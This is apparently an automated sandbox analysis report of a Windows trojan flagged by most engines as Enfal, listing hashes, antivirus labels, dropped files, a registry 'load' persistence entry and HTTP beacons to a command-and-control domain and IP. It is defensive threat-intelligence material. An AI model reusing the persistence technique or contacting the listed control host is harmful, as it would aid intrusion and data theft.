Analysis Date: 2015-07-25 09:48:38
MD5: 5fa0df3622e559011eb3a982df950dfa
SHA1: 8859f68922829f26941493c36aa18a3c564d541d

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text   md5: ebaffbcce6700e602c330afb8a10b305 sha1: 48b25b6594aa47655202802d96f6a258f298e9ad size: 40960
Section .rdata  md5: b3039154963e572fc5d4c99b6131eeb3 sha1: 996cfad3ca45d5184152d9db15469c84e62037f4 size: 4096
Section .data   md5: 11f3befade243fdbe77595e8f89f89a7 sha1: 925429690c22fd1c312a14c085e798b6e9170599 size: 8192
Section .vmp0   md5: 7c0903ac595041cc6ca90d4e4c7db6b9 sha1: ad7c590c4b86cde66eb678e16b08c358a10bcee2 size: 303104
Section .vmp1   md5: b79414ab2e22f43180fbe4d022a0d764 sha1: 328ae4bc6786740f861f36a264e3538f11feaa0e size: 4096
Timestamp: 2005-03-17 12:52:20
Packer: Installer VISE Custom
PEhash: 84695dc32104ededd6274c36e681514d649172bb
IMPhash: c13616839e3f125f25bbcdf06e9d450c
AV Rising: no_virus
AV Mcafee: Enfal
AV Avira (antivir): TR/Enfal.A.1
AV Twister: Trojan.E7C49A00CB204E0F
AV Ad-Aware: Gen:Variant.Symmi.42055
AV Alwil (avast): Samsa-I [Trj]
AV Eset (nod32): Win32/Spy.Agent.NFG
AV Grisoft (avg): PSW.Agent.7.Q
AV Symantec: Downloader
AV Fortinet: Enfal!tr
AV BitDefender: Gen:Variant.Symmi.42055
AV K7: Backdoor ( 04c4c34c1 )
AV Microsoft Security Essentials: Trojan:Win32/Enfal.F
AV MicroWorld (escan): Gen:Variant.Symmi.42055
AV MalwareBytes: no_virus
AV Authentium: W32/Trojan.CHVJ-6708
AV Frisk (f-prot): W32/Trojan2.CJCV
AV Ikarus: Trojan-Spy.Win32.Agent.M
AV Emsisoft: Gen:Variant.Symmi.42055
AV Zillya!: Trojan.Win32.4932D2F0
AV Kaspersky: Trojan-Spy.Win32.Agent.bjr
AV Trend Micro: no_virus
AV CAT (quickheal): no_virus
AV VirusBlokAda (vba32): no_virus
AV Padvish: Malware.Trojan.Spy-27259
AV BullGuard: Gen:Variant.Symmi.42055
AV Arcabit (arcavir): Gen:Variant.Symmi.42055
AV ClamAV: Trojan.Spy-27259
AV Dr. Web: Trojan.PWS.Spy.8422
AV F-Secure: Gen:Variant.Symmi.42055
AV CA (E-Trust Ino): Win32/Etilqci.B

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File: \Device\Netbios
Creates Mutex: MAIN
Creates Mutex: CMD

Process
↳ C:\WINDOWS\Explorer.EXE

Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\load ➝ C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\korwbrkr1.exe
Registry: HKEY_CURRENT_USER\SessionInformation\ProgramCount ➝ NULL
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\7d13_appcompat.txt
Creates File: C:\WINDOWS\system32\korwbrkr1.exe
Creates File: C:\WINDOWS\system32\msvcrt80.dll
Creates Process: C:\WINDOWS\system32\drwtsn32 -p 320 -e 1564 -g
Creates Process: C:\WINDOWS\system32\dwwin.exe -x -s 1580
Creates Mutex: CMD
Winsock URL: http://bsek5.ggsddup.com/httpdocs/Accred
Winsock URL: http://bsek5.ggsddup.com/httpdocs/wblt
Winsock URL: http://bsek5.ggsddup.com/httpdocs/mm/COMPUTER-XXXXXX:00-00-00-00-00-00/Tiblue

Process
↳ C:\WINDOWS\system32\dwwin.exe -x -s 1580

Process
↳ C:\WINDOWS\system32\drwtsn32 -p 320 -e 1564 -g

Network Details:

DNS: bsek5.ggsddup.com
Type: A
66.228.63.51
HTTP POST: http://bsek5.ggsddup.com/cgi-bin/Owpq4.cgi
User-Agent: (empty)
HTTP POST: http://bsek5.ggsddup.com/cgi-bin/Fupq9.cgi
User-Agent: (empty)
HTTP GET: http://bsek5.ggsddup.com/httpdocs/mm/COMPUTER-XXXXXX:00-00-00-00-00-00/Tiblue
User-Agent: (empty)
HTTP GET: http://bsek5.ggsddup.com/httpdocs/Accred
User-Agent: (empty)
HTTP GET: http://bsek5.ggsddup.com/httpdocs/wblt
User-Agent: (empty)
Flows TCP: 192.168.1.1:1031 ➝ 66.228.63.51:80
Flows TCP: 192.168.1.1:1032 ➝ 66.228.63.51:80
Flows TCP: 192.168.1.1:1033 ➝ 66.228.63.51:80
Flows TCP: 192.168.1.1:1034 ➝ 66.228.63.51:80
Flows TCP: 192.168.1.1:1035 ➝ 66.228.63.51:80

Raw Pcap

Strings